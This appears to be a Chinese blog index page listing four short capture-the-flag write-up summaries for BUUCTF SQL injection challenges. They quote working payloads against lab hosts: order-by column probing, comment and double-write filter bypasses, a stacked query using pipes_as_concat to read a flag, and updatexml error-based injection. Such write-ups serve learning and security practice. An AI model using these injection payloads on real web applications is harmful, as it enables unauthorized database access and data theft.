摘要: 题目考察了字符绕过,注释符绕过,sql双写绕过 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin . 可以看到or和b 阅读全文
posted @ 2020-12-19 19:54 !rbash 阅读(121) 评论(0) 推荐(0) 编辑
摘要: 好吧这题是我不配 看了网上大佬的WP payload1:*,1 大佬的解法,好像直接将源码猜出来了 select $_GET['query'] || flag from flagpayload2:select 1;set sql_mode=pipes_as_concat;select 1||flag 阅读全文
posted @ 2020-12-19 16:48 !rbash 阅读(575) 评论(0) 推荐(0) 编辑
摘要: 万能密码登入 尝试解密MD5,解密失败尝试其他注入思路 http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显 http:/ 阅读全文
posted @ 2020-12-19 15:42 !rbash 阅读(128) 评论(0) 推荐(0) 编辑
摘要: 使用updatexml报错法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23 阅读全文
posted @ 2020-12-19 14:29 !rbash 阅读(137) 评论(0) 推荐(0) 编辑